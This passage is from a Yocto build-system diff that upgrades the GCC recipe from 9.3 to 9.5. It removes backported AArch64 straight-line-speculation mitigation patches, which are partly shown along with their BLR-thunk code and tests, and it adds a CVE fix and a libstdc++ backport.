- * config/aarch64/aarch64.h (STB_REGNUM_P): New.
- (enum reg_class): Add STUB_REGS class.
- (machine_function): Introduce `call_via` array for
- function-local stub labels.
- * config/aarch64/aarch64.md (*call_insn, *call_value_insn): Use
- aarch64_indirect_call_asm to emit code when hardening BLR
- instructions.
- * config/aarch64/constraints.md (Ucr): New constraint
- representing registers for indirect calls. Is GENERAL_REGS
- usually, and STUB_REGS when hardening BLR instruction against
- SLS.
- * config/aarch64/predicates.md (aarch64_general_reg): STUB_REGS class
- is also a general register.
-
-gcc/testsuite/ChangeLog:
-
- * gcc.target/aarch64/sls-mitigation/sls-miti-blr-bti.c: New test.
- * gcc.target/aarch64/sls-mitigation/sls-miti-blr.c: New test.
----
- gcc/config/aarch64/aarch64-protos.h | 1 +
- gcc/config/aarch64/aarch64.c | 225 +++++++++++++++++-
- gcc/config/aarch64/aarch64.h | 15 ++
- gcc/config/aarch64/aarch64.md | 11 +-
- gcc/config/aarch64/constraints.md | 9 +
- gcc/config/aarch64/predicates.md | 3 +-
- .../aarch64/sls-mitigation/sls-miti-blr-bti.c | 40 ++++
- .../aarch64/sls-mitigation/sls-miti-blr.c | 33 +++
- 8 files changed, 328 insertions(+), 9 deletions(-)
- create mode 100644 gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-blr-bti.c
- create mode 100644 gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-blr.c
-
-diff --git a/gcc/config/aarch64/aarch64-protos.h b/gcc/config/aarch64/aarch64-protos.h
-index 885eae893..2676e43ae 100644
---- a/gcc/config/aarch64/aarch64-protos.h
-+++ b/gcc/config/aarch64/aarch64-protos.h
-@@ -645,6 +645,7 @@ poly_uint64 aarch64_regmode_natural_size (machine_mode);
- bool aarch64_high_bits_all_ones_p (HOST_WIDE_INT);
-
- const char *aarch64_sls_barrier (int);
-+const char *aarch64_indirect_call_asm (rtx);
- extern bool aarch64_harden_sls_retbr_p (void);
- extern bool aarch64_harden_sls_blr_p (void);
-
-diff --git a/gcc/config/aarch64/aarch64.c b/gcc/config/aarch64/aarch64.c
-index dff61105c..bc6c02c3a 100644
---- a/gcc/config/aarch64/aarch64.c
-+++ b/gcc/config/aarch64/aarch64.c
-@@ -8190,6 +8190,9 @@ aarch64_label_mentioned_p (rtx x)
- enum reg_class
- aarch64_regno_regclass (unsigned regno)
- {
-+ if (STUB_REGNUM_P (regno))
-+ return STUB_REGS;
-+
- if (GP_REGNUM_P (regno))
- return GENERAL_REGS;
-
-@@ -8499,6 +8502,7 @@ aarch64_class_max_nregs (reg_class_t regclass, machine_mode mode)
- unsigned int nregs;
- switch (regclass)
- {
-+ case STUB_REGS:
- case TAILCALL_ADDR_REGS:
- case POINTER_REGS:
- case GENERAL_REGS:
-@@ -10693,10 +10697,12 @@ aarch64_register_move_cost (machine_mode mode,
- = aarch64_tune_params.regmove_cost;
-
- /* Caller save and pointer regs are equivalent to GENERAL_REGS. */
-- if (to == TAILCALL_ADDR_REGS || to == POINTER_REGS)
-+ if (to == TAILCALL_ADDR_REGS || to == POINTER_REGS
-+ || to == STUB_REGS)
- to = GENERAL_REGS;
-
-- if (from == TAILCALL_ADDR_REGS || from == POINTER_REGS)
-+ if (from == TAILCALL_ADDR_REGS || from == POINTER_REGS
-+ || from == STUB_REGS)
- from = GENERAL_REGS;
-
- /* Moving between GPR and stack cost is the same as GP2GP. */
-@@ -19009,6 +19015,215 @@ aarch64_sls_barrier (int mitigation_required)
- : "";
- }
-
-+static GTY (()) tree aarch64_sls_shared_thunks[30];
-+static GTY (()) bool aarch64_sls_shared_thunks_needed = false;
-+const char *indirect_symbol_names[30] = {
-+ "__call_indirect_x0",
-+ "__call_indirect_x1",
-+ "__call_indirect_x2",
-+ "__call_indirect_x3",
-+ "__call_indirect_x4",
-+ "__call_indirect_x5",
-+ "__call_indirect_x6",
-+ "__call_indirect_x7",
-+ "__call_indirect_x8",
-+ "__call_indirect_x9",
-+ "__call_indirect_x10",
-+ "__call_indirect_x11",
-+ "__call_indirect_x12",
-+ "__call_indirect_x13",
-+ "__call_indirect_x14",
-+ "__call_indirect_x15",
-+ "", /* "__call_indirect_x16", */
-+ "", /* "__call_indirect_x17", */
-+ "__call_indirect_x18",
-+ "__call_indirect_x19",
-+ "__call_indirect_x20",
-+ "__call_indirect_x21",
-+ "__call_indirect_x22",
-+ "__call_indirect_x23",
-+ "__call_indirect_x24",
-+ "__call_indirect_x25",
-+ "__call_indirect_x26",
-+ "__call_indirect_x27",
-+ "__call_indirect_x28",
-+ "__call_indirect_x29",
-+};
-+
-+/* Function to create a BLR thunk. This thunk is used to mitigate straight
-+ line speculation. Instead of a simple BLR that can be speculated past,
-+ we emit a BL to this thunk, and this thunk contains a BR to the relevant
-+ register. These thunks have the relevant speculation barries put after
-+ their indirect branch so that speculation is blocked.
-+
-+ We use such a thunk so the speculation barriers are kept off the
-+ architecturally executed path in order to reduce the performance overhead.
-+
-+ When optimizing for size we use stubs shared by the linked object.
-+ When optimizing for performance we emit stubs for each function in the hope
-+ that the branch predictor can better train on jumps specific for a given
-+ function. */
-+rtx
-+aarch64_sls_create_blr_label (int regnum)
-+{
-+ gcc_assert (STUB_REGNUM_P (regnum));
-+ if (optimize_function_for_size_p (cfun))
-+ {
-+ /* For the thunks shared between different functions in this compilation
-+ unit we use a named symbol -- this is just for users to more easily
-+ understand the generated assembly. */
-+ aarch64_sls_shared_thunks_needed = true;
-+ const char *thunk_name = indirect_symbol_names[regnum];
-+ if (aarch64_sls_shared_thunks[regnum] == NULL)
-+ {
-+ /* Build a decl representing this function stub and record it for
-+ later. We build a decl here so we can use the GCC machinery for
-+ handling sections automatically (through `get_named_section` and
-+ `make_decl_one_only`). That saves us a lot of trouble handling
-+ the specifics of different output file formats. */
-+ tree decl = build_decl (BUILTINS_LOCATION, FUNCTION_DECL,
-+ get_identifier (thunk_name),
-+ build_function_type_list (void_type_node,
-+ NULL_TREE));
-+ DECL_RESULT (decl) = build_decl (BUILTINS_LOCATION, RESULT_DECL,
-+ NULL_TREE, void_type_node);
-+ TREE_PUBLIC (decl) = 1;
-+ TREE_STATIC (decl) = 1;
-+ DECL_IGNORED_P (decl) = 1;
-+ DECL_ARTIFICIAL (decl) = 1;
-+ make_decl_one_only (decl, DECL_ASSEMBLER_NAME (decl));
-+ resolve_unique_section (decl, 0, false);
-+ aarch64_sls_shared_thunks[regnum] = decl;
-+ }
-+
-+ return gen_rtx_SYMBOL_REF (Pmode, thunk_name);
-+ }
-+
-+ if (cfun->machine->call_via[regnum] == NULL)
-+ cfun->machine->call_via[regnum]
-+ = gen_rtx_LABEL_REF (Pmode, gen_label_rtx ());
-+ return cfun->machine->call_via[regnum];
-+}
-+
-+/* Helper function for aarch64_sls_emit_blr_function_thunks and
-+ aarch64_sls_emit_shared_blr_thunks below. */
-+static void
-+aarch64_sls_emit_function_stub (FILE *out_file, int regnum)
-+{
-+ /* Save in x16 and branch to that function so this transformation does
-+ not prevent jumping to `BTI c` instructions. */
-+ asm_fprintf (out_file, "\tmov\tx16, x%d\n", regnum);
-+ asm_fprintf (out_file, "\tbr\tx16\n");
-+}
-+
-+/* Emit all BLR stubs for this particular function.
-+ Here we emit all the BLR stubs needed for the current function. Since we
-+ emit these stubs in a consecutive block we know there will be no speculation
-+ gadgets between each stub, and hence we only emit a speculation barrier at
-+ the end of the stub sequences.
-+
-+ This is called in the TARGET_ASM_FUNCTION_EPILOGUE hook. */
-+void
-+aarch64_sls_emit_blr_function_thunks (FILE *out_file)
-+{
-+ if (! aarch64_harden_sls_blr_p ())
-+ return;
-+
-+ bool any_functions_emitted = false;
-+ /* We must save and restore the current function section since this assembly
-+ is emitted at the end of the function. This means it can be emitted *just
-+ after* the cold section of a function. That cold part would be emitted in
-+ a different section. That switch would trigger a `.cfi_endproc` directive
-+ to be emitted in the original section and a `.cfi_startproc` directive to
-+ be emitted in the new section. Switching to the original section without
-+ restoring would mean that the `.cfi_endproc` emitted as a function ends
-+ would happen in a different section -- leaving an unmatched
-+ `.cfi_startproc` in the cold text section and an unmatched `.cfi_endproc`
-+ in the standard text section. */
-+ section *save_text_section = in_section;
-+ switch_to_section (function_section (current_function_decl));
-+ for (int regnum = 0; regnum < 30; ++regnum)
-+ {
-+ rtx specu_label = cfun->machine->call_via[regnum];
-+ if (specu_label == NULL)
-+ continue;
-+
-+ targetm.asm_out.print_operand (out_file, specu_label, 0);
-+ asm_fprintf (out_file, ":\n");
-+ aarch64_sls_emit_function_stub (out_file, regnum);
-+ any_functions_emitted = true;
-+ }
-+ if (any_functions_emitted)
-+ /* Can use the SB if needs be here, since this stub will only be used
-+ by the current function, and hence for the current target. */
-+ asm_fprintf (out_file, "\t%s\n", aarch64_sls_barrier (true));
-+ switch_to_section (save_text_section);
-+}
-+
-+/* Emit shared BLR stubs for the current compilation unit.
-+ Over the course of compiling this unit we may have converted some BLR
-+ instructions to a BL to a shared stub function. This is where we emit those
-+ stub functions.
-+ This function is for the stubs shared between different functions in this
-+ compilation unit. We share when optimizing for size instead of speed.
-+
-+ This function is called through the TARGET_ASM_FILE_END hook. */
-+void
-+aarch64_sls_emit_shared_blr_thunks (FILE *out_file)
-+{
-+ if (! aarch64_sls_shared_thunks_needed)
-+ return;
-+
-+ for (int regnum = 0; regnum < 30; ++regnum)
-+ {
-+ tree decl = aarch64_sls_shared_thunks[regnum];
-+ if (!decl)
-+ continue;
-+
-+ const char *name = indirect_symbol_names[regnum];
-+ switch_to_section (get_named_section (decl, NULL, 0));
-+ ASM_OUTPUT_ALIGN (out_file, 2);
-+ targetm.asm_out.globalize_label (out_file, name);
-+ /* Only emits if the compiler is configured for an assembler that can
-+ handle visibility directives. */
-+ targetm.asm_out.assemble_visibility (decl, VISIBILITY_HIDDEN);
-+ ASM_OUTPUT_TYPE_DIRECTIVE (out_file, name, "function");
-+ ASM_OUTPUT_LABEL (out_file, name);
-+ aarch64_sls_emit_function_stub (out_file, regnum);
-+ /* Use the most conservative target to ensure it can always be used by any
-+ function in the translation unit. */
-+ asm_fprintf (out_file, "\tdsb\tsy\n\tisb\n");
-+ ASM_DECLARE_FUNCTION_SIZE (out_file, name, decl);
-+ }
-+}
-+
-+/* Implement TARGET_ASM_FILE_END. */
-+void
-+aarch64_asm_file_end ()
-+{
-+ aarch64_sls_emit_shared_blr_thunks (asm_out_file);
-+ /* Since this function will be called for the ASM_FILE_END hook, we ensure
-+ that what would be called otherwise (e.g. `file_end_indicate_exec_stack`
-+ for FreeBSD) still gets called. */
-+#ifdef TARGET_ASM_FILE_END
-+ TARGET_ASM_FILE_END ();
-+#endif
-+}
-+
-+const char *
-+aarch64_indirect_call_asm (rtx addr)
-+{
-+ gcc_assert (REG_P (addr));
-+ if (aarch64_harden_sls_blr_p ())
-+ {
-+ rtx stub_label = aarch64_sls_create_blr_label (REGNO (addr));
-+ output_asm_insn ("bl\t%0", &stub_label);
-+ }
-+ else
-+ output_asm_insn ("blr\t%0", &addr);
-+ return "";
-+}
-+
- /* Target-specific selftests. */
-
- #if CHECKING_P
-@@ -19529,6 +19744,12 @@ aarch64_libgcc_floating_mode_supported_p
- #define TARGET_RUN_TARGET_SELFTESTS selftest::aarch64_run_selftests
- #endif /* #if CHECKING_P */
-
-+#undef TARGET_ASM_FILE_END
-+#define TARGET_ASM_FILE_END aarch64_asm_file_end
-+
-+#undef TARGET_ASM_FUNCTION_EPILOGUE
-+#define TARGET_ASM_FUNCTION_EPILOGUE aarch64_sls_emit_blr_function_thunks
-+
- struct gcc_target targetm = TARGET_INITIALIZER;
-
- #include "gt-aarch64.h"
-diff --git a/gcc/config/aarch64/aarch64.h b/gcc/config/aarch64/aarch64.h
-index 72ddc6fd9..60682a100 100644
---- a/gcc/config/aarch64/aarch64.h
-+++ b/gcc/config/aarch64/aarch64.h
-@@ -540,6 +540,16 @@ extern unsigned aarch64_architecture_version;
- #define GP_REGNUM_P(REGNO) \
- (((unsigned) (REGNO - R0_REGNUM)) <= (R30_REGNUM - R0_REGNUM))
-
-+/* Registers known to be preserved over a BL instruction. This consists of the
-+ GENERAL_REGS without x16, x17, and x30. The x30 register is changed by the
-+ BL instruction itself, while the x16 and x17 registers may be used by
-+ veneers which can be inserted by the linker. */
-+#define STUB_REGNUM_P(REGNO) \
-+ (GP_REGNUM_P (REGNO) \
-+ && (REGNO) != R16_REGNUM \
-+ && (REGNO) != R17_REGNUM \
-+ && (REGNO) != R30_REGNUM) \
-+
- #define FP_REGNUM_P(REGNO) \
- (((unsigned) (REGNO - V0_REGNUM)) <= (V31_REGNUM - V0_REGNUM))
-
-@@ -561,6 +571,7 @@ enum reg_class
- {
- NO_REGS,
- TAILCALL_ADDR_REGS,
-+ STUB_REGS,
- GENERAL_REGS,
- STACK_REG,
- POINTER_REGS,
-@@ -580,6 +591,7 @@ enum reg_class
- { \
- "NO_REGS", \
- "TAILCALL_ADDR_REGS", \
-+ "STUB_REGS", \
- "GENERAL_REGS", \
- "STACK_REG", \
- "POINTER_REGS", \
-@@ -596,6 +608,7 @@ enum reg_class
- { \
- { 0x00000000, 0x00000000, 0x00000000 }, /* NO_REGS */ \
- { 0x00030000, 0x00000000, 0x00000000 }, /* TAILCALL_ADDR_REGS */\
-+ { 0x3ffcffff, 0x00000000, 0x00000000 }, /* STUB_REGS */ \
- { 0x7fffffff, 0x00000000, 0x00000003 }, /* GENERAL_REGS */ \
- { 0x80000000, 0x00000000, 0x00000000 }, /* STACK_REG */ \
- { 0xffffffff, 0x00000000, 0x00000003 }, /* POINTER_REGS */ \
-@@ -735,6 +748,8 @@ typedef struct GTY (()) machine_function
- struct aarch64_frame frame;
- /* One entry for each hard register. */
- bool reg_is_wrapped_separately[LAST_SAVED_REGNUM];
-+ /* One entry for each general purpose register. */
-+ rtx call_via[SP_REGNUM];
- bool label_is_assembled;
- } machine_function;
- #endif
-diff --git a/gcc/config/aarch64/aarch64.md b/gcc/config/aarch64/aarch64.md
-index 494aee964..ed8cf8ece 100644
---- a/gcc/config/aarch64/aarch64.md
-+++ b/gcc/config/aarch64/aarch64.md
-@@ -908,15 +908,14 @@
- )
-
- (define_insn "*call_insn"
-- [(call (mem:DI (match_operand:DI 0 "aarch64_call_insn_operand" "r, Usf"))
-+ [(call (mem:DI (match_operand:DI 0 "aarch64_call_insn_operand" "Ucr, Usf"))
- (match_operand 1 "" ""))
- (clobber (reg:DI LR_REGNUM))]
- ""
- "@
-- blr\\t%0
-+ * return aarch64_indirect_call_asm (operands[0]);
- bl\\t%c0"
-- [(set_attr "type" "call, call")]
--)
-+ [(set_attr "type" "call, call")])
-
- (define_expand "call_value"
- [(parallel [(set (match_operand 0 "" "")
-@@ -934,12 +933,12 @@
-
- (define_insn "*call_value_insn"
- [(set (match_operand 0 "" "")
-- (call (mem:DI (match_operand:DI 1 "aarch64_call_insn_operand" "r, Usf"))
-+ (call (mem:DI (match_operand:DI 1 "aarch64_call_insn_operand" "Ucr, Usf"))
- (match_operand 2 "" "")))
- (clobber (reg:DI LR_REGNUM))]
- ""
- "@
-- blr\\t%1
-+ * return aarch64_indirect_call_asm (operands[1]);
- bl\\t%c1"
- [(set_attr "type" "call, call")]
- )
-diff --git a/gcc/config/aarch64/constraints.md b/gcc/config/aarch64/constraints.md
-index 21f9549e6..7756dbe83 100644
---- a/gcc/config/aarch64/constraints.md
-+++ b/gcc/config/aarch64/constraints.md
-@@ -24,6 +24,15 @@
- (define_register_constraint "Ucs" "TAILCALL_ADDR_REGS"
- "@internal Registers suitable for an indirect tail call")
-
-+(define_register_constraint "Ucr"
-+ "aarch64_harden_sls_blr_p () ? STUB_REGS : GENERAL_REGS"
-+ "@internal Registers to be used for an indirect call.
-+ This is usually the general registers, but when we are hardening against
-+ Straight Line Speculation we disallow x16, x17, and x30 so we can use
-+ indirection stubs. These indirection stubs cannot use the above registers
-+ since they will be reached by a BL that may have to go through a linker
-+ veneer.")
-+
- (define_register_constraint "w" "FP_REGS"
- "Floating point and SIMD vector registers.")
-
-diff --git a/gcc/config/aarch64/predicates.md b/gcc/config/aarch64/predicates.md
-index 8e1b78421..4250aecb3 100644
---- a/gcc/config/aarch64/predicates.md
-+++ b/gcc/config/aarch64/predicates.md
-@@ -32,7 +32,8 @@
-
- (define_predicate "aarch64_general_reg"
- (and (match_operand 0 "register_operand")
-- (match_test "REGNO_REG_CLASS (REGNO (op)) == GENERAL_REGS")))
-+ (match_test "REGNO_REG_CLASS (REGNO (op)) == STUB_REGS
-+ || REGNO_REG_CLASS (REGNO (op)) == GENERAL_REGS")))
-
- ;; Return true if OP a (const_int 0) operand.
- (define_predicate "const0_operand"
-diff --git a/gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-blr-bti.c b/gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-blr-bti.c
-new file mode 100644
-index 000000000..b1fb754c7
---- /dev/null
-+++ b/gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-blr-bti.c
-@@ -0,0 +1,40 @@
-+/* { dg-do compile } */
-+/* { dg-additional-options "-mharden-sls=blr -mbranch-protection=bti" } */
-+/*
-+ Ensure that the SLS hardening of BLR leaves no BLR instructions.
-+ Here we also check that there are no BR instructions with anything except an
-+ x16 or x17 register. This is because a `BTI c` instruction can be branched
-+ to using a BLR instruction using any register, but can only be branched to
-+ with a BR using an x16 or x17 register.
-+ */
-+typedef int (foo) (int, int);
-+typedef void (bar) (int, int);
-+struct sls_testclass {
-+ foo *x;
-+ bar *y;
-+ int left;
-+ int right;
-+};
-+
-+/* We test both RTL patterns for a call which returns a value and a call which
-+ does not. */
-+int blr_call_value (struct sls_testclass x)
-+{
-+ int retval = x.x(x.left, x.right);
-+ if (retval % 10)
-+ return 100;
-+ return 9;
-+}
-+
-+int blr_call (struct sls_testclass x)
-+{
-+ x.y(x.left, x.right);
-+ if (x.left % 10)
-+ return 100;
-+ return 9;
-+}
-+
-+/* { dg-final { scan-assembler-not {\tblr\t} } } */
-+/* { dg-final { scan-assembler-not {\tbr\tx(?!16|17)} } } */
-+/* { dg-final { scan-assembler {\tbr\tx(16|17)} } } */
-+
-diff --git a/gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-blr.c b/gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-blr.c
-new file mode 100644
-index 000000000..88baffffe
---- /dev/null
-+++ b/gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-blr.c
-@@ -0,0 +1,33 @@
-+/* { dg-additional-options "-mharden-sls=blr -save-temps" } */
-+/* Ensure that the SLS hardening of BLR leaves no BLR instructions.
-+ We only test that all BLR instructions have been removed, not that the
-+ resulting code makes sense. */
-+typedef int (foo) (int, int);
-+typedef void (bar) (int, int);
-+struct sls_testclass {
-+ foo *x;
-+ bar *y;
-+ int left;
-+ int right;
-+};
-+
-+/* We test both RTL patterns for a call which returns a value and a call which
-+ does not. */
-+int blr_call_value (struct sls_testclass x)
-+{
-+ int retval = x.x(x.left, x.right);
-+ if (retval % 10)
-+ return 100;
-+ return 9;
-+}
-+
-+int blr_call (struct sls_testclass x)
-+{
-+ x.y(x.left, x.right);
-+ if (x.left % 10)
-+ return 100;
-+ return 9;
-+}
-+
-+/* { dg-final { scan-assembler-not {\tblr\t} } } */
-+/* { dg-final { scan-assembler {\tbr\tx[0-9][0-9]?} } } */
---
-2.25.1
-
diff --git a/meta/recipes-devtools/gcc/gcc-9.3.inc b/meta/recipes-devtools/gcc/gcc-9.5.inc
index 4c54ba250a..9bb41bbe24 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3.inc
+++ b/meta/recipes-devtools/gcc/gcc-9.5.inc
@@ -2,13 +2,13 @@ require gcc-common.inc
# Third digit in PV should be incremented after a minor release
-PV = "9.3.0"
+PV = "9.5.0"
# BINV should be incremented to a revision after a minor gcc release
-BINV = "9.3.0"
+BINV = "9.5.0"
-FILESEXTRAPATHS =. "${FILE_DIRNAME}/gcc-9.3:${FILE_DIRNAME}/gcc-9.3/backport:"
+FILESEXTRAPATHS =. "${FILE_DIRNAME}/gcc-9.5:${FILE_DIRNAME}/gcc-9.5/backport:"
DEPENDS =+ "mpfr gmp libmpc zlib flex-native"
NATIVEDEPS = "mpfr-native gmp-native libmpc-native zlib-native flex-native"
@@ -69,15 +69,14 @@ SRC_URI = "\
file://0037-CVE-2019-14250-Check-zero-value-in-simple_object_elf.patch \
file://0038-gentypes-genmodes-Do-not-use-__LINE__-for-maintainin.patch \
file://0039-process_alt_operands-Don-t-match-user-defined-regs-o.patch \
- file://0001-aarch64-New-Straight-Line-Speculation-SLS-mitigation.patch \
- file://0002-aarch64-Introduce-SLS-mitigation-for-RET-and-BR-inst.patch \
- file://0003-aarch64-Mitigate-SLS-for-BLR-instruction.patch \
+ file://0002-libstdc-Fix-inconsistent-noexcept-specific-for-valar.patch \
+ file://CVE-2023-4039.patch \
"
S = "${TMPDIR}/work-shared/gcc-${PV}-${PR}/gcc-${PV}"
-SRC_URI[sha256sum] = "71e197867611f6054aa1119b13a0c0abac12834765fe2d81f35ac57f84f742d1"
+SRC_URI[sha256sum] = "27769f64ef1d4cd5e2be8682c0c93f9887983e6cfd1a927ce5a0a2915a95cf8f"
# For dev release snapshotting
#S = "${TMPDIR}/work-shared/gcc-${PV}-${PR}/official-gcc-${RELEASE}"
-#B = "${WORKDIR}/gcc-${PV}/build.${HOST_SYS}.${TARGET_SYS}"
+B = "${WORKDIR}/gcc-${PV}/build.${HOST_SYS}.${TARGET_SYS}"
# Language Overrides
FORTRAN = ""
@@ -122,3 +121,6 @@ EXTRA_OECONF_PATHS = "\
--with-sysroot=/not/exist \
--with-build-sysroot=${STAGING_DIR_TARGET} \
"
+
+# Is a binutils 2.26 issue, not gcc
+CVE_CHECK_WHITELIST += "CVE-2021-37322"
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0001-gcc-4.3.1-ARCH_FLAGS_FOR_TARGET.patch b/meta/recipes-devtools/gcc/gcc-9.5/0001-gcc-4.3.1-ARCH_FLAGS_FOR_TARGET.patch
index 0d9222df17..0d9222df17 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0001-gcc-4.3.1-ARCH_FLAGS_FOR_TARGET.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0001-gcc-4.3.1-ARCH_FLAGS_FOR_TARGET.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0002-gcc-poison-system-directories.patch b/meta/recipes-devtools/gcc/gcc-9.5/0002-gcc-poison-system-directories.patch
index f427ee67c1..f427ee67c1 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0002-gcc-poison-system-directories.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0002-gcc-poison-system-directories.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.5/0002-libstdc-Fix-inconsistent-noexcept-specific-for-valar.patch b/meta/recipes-devtools/gcc/gcc-9.5/0002-libstdc-Fix-inconsistent-noexcept-specific-for-valar.patch
new file mode 100644
index 0000000000..506064bfc2
--- /dev/null
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0002-libstdc-Fix-inconsistent-noexcept-specific-for-valar.patch
@@ -0,0 +1,44 @@
+From 60d966708d7cf105dccf128d2b7a38b0b2580a1a Mon Sep 17 00:00:00 2001
+From: Jonathan Wakely <jwakely@redhat.com>
+Date: Fri, 5 Nov 2021 21:42:20 +0000
+Subject: [PATCH] libstdc++: Fix inconsistent noexcept-specific for valarray
+ begin/end
+
+These declarations should be noexcept after I added it to the
+definitions in <valarray>.
+
+libstdc++-v3/ChangeLog:
+
+ * include/bits/range_access.h (begin(valarray), end(valarray)):
+ Add noexcept.
+
+(cherry picked from commit 2b2d97fc545635a0f6aa9c9ee3b017394bc494bf)
+
+Upstream-Status: Backport [https://github.com/hkaelber/gcc/commit/2b2d97fc545635a0f6aa9c9ee3b017394bc494bf]
+Signed-off-by: Virendra Thakur <virendrak@kpit.com>
+
+---
+ libstdc++-v3/include/bits/range_access.h | 8 ++++----
+ 1 file changed, 4 insertions(+), 4 deletions(-)
+
+diff --git a/libstdc++-v3/include/bits/range_access.h b/libstdc++-v3/include/bits/range_access.h
+index 3d99ea92027..4736e75fda1 100644
+--- a/libstdc++-v3/include/bits/range_access.h
++++ b/libstdc++-v3/include/bits/range_access.h
+@@ -101,10 +101,10 @@ _GLIBCXX_BEGIN_NAMESPACE_VERSION
+
+ template<typename _Tp> class valarray;
+ // These overloads must be declared for cbegin and cend to use them.
+- template<typename _Tp> _Tp* begin(valarray<_Tp>&);
+- template<typename _Tp> const _Tp* begin(const valarray<_Tp>&);
+- template<typename _Tp> _Tp* end(valarray<_Tp>&);
+- template<typename _Tp> const _Tp* end(const valarray<_Tp>&);
++ template<typename _Tp> _Tp* begin(valarray<_Tp>&) noexcept;
++ template<typename _Tp> const _Tp* begin(const valarray<_Tp>&) noexcept;
++ template<typename _Tp> _Tp* end(valarray<_Tp>&) noexcept;
++ template<typename _Tp> const _Tp* end(const valarray<_Tp>&) noexcept;
+
+ /**
+ * @brief Return an iterator pointing to the first element of
+--
+2.25.1 \ No newline at end of file
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0003-gcc-4.3.3-SYSROOT_CFLAGS_FOR_TARGET.patch b/meta/recipes-devtools/gcc/gcc-9.5/0003-gcc-4.3.3-SYSROOT_CFLAGS_FOR_TARGET.patch
index 23ec5bce03..23ec5bce03 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0003-gcc-4.3.3-SYSROOT_CFLAGS_FOR_TARGET.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0003-gcc-4.3.3-SYSROOT_CFLAGS_FOR_TARGET.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0004-64-bit-multilib-hack.patch b/meta/recipes-devtools/gcc/gcc-9.5/0004-64-bit-multilib-hack.patch
index 17ec8986c1..17ec8986c1 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0004-64-bit-multilib-hack.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0004-64-bit-multilib-hack.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0005-optional-libstdc.patch b/meta/recipes-devtools/gcc/gcc-9.5/0005-optional-libstdc.patch
index 3c28aeac63..3c28aeac63 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0005-optional-libstdc.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0005-optional-libstdc.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0006-COLLECT_GCC_OPTIONS.patch b/meta/recipes-devtools/gcc/gcc-9.5/0006-COLLECT_GCC_OPTIONS.patch
index 906f3a7317..906f3a7317 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0006-COLLECT_GCC_OPTIONS.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0006-COLLECT_GCC_OPTIONS.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0007-Use-the-defaults.h-in-B-instead-of-S-and-t-oe-in-B.patch b/meta/recipes-devtools/gcc/gcc-9.5/0007-Use-the-defaults.h-in-B-instead-of-S-and-t-oe-in-B.patch
index 68a876cb95..68a876cb95 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0007-Use-the-defaults.h-in-B-instead-of-S-and-t-oe-in-B.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0007-Use-the-defaults.h-in-B-instead-of-S-and-t-oe-in-B.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0008-fortran-cross-compile-hack.patch b/meta/recipes-devtools/gcc/gcc-9.5/0008-fortran-cross-compile-hack.patch
index 6acd2b0cf9..6acd2b0cf9 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0008-fortran-cross-compile-hack.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0008-fortran-cross-compile-hack.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0009-cpp-honor-sysroot.patch b/meta/recipes-devtools/gcc/gcc-9.5/0009-cpp-honor-sysroot.patch
index 5a9e527606..5a9e527606 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0009-cpp-honor-sysroot.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0009-cpp-honor-sysroot.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0010-MIPS64-Default-to-N64-ABI.patch b/meta/recipes-devtools/gcc/gcc-9.5/0010-MIPS64-Default-to-N64-ABI.patch
index a8103b951e..a8103b951e 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0010-MIPS64-Default-to-N64-ABI.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0010-MIPS64-Default-to-N64-ABI.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0011-Define-GLIBC_DYNAMIC_LINKER-and-UCLIBC_DYNAMIC_LINKE.patch b/meta/recipes-devtools/gcc/gcc-9.5/0011-Define-GLIBC_DYNAMIC_LINKER-and-UCLIBC_DYNAMIC_LINKE.patch
index d9d563d0f7..d9d563d0f7 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0011-Define-GLIBC_DYNAMIC_LINKER-and-UCLIBC_DYNAMIC_LINKE.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0011-Define-GLIBC_DYNAMIC_LINKER-and-UCLIBC_DYNAMIC_LINKE.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0012-gcc-Fix-argument-list-too-long-error.patch b/meta/recipes-devtools/gcc/gcc-9.5/0012-gcc-Fix-argument-list-too-long-error.patch
index 9d98878096..f0b79ee145 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0012-gcc-Fix-argument-list-too-long-error.patch
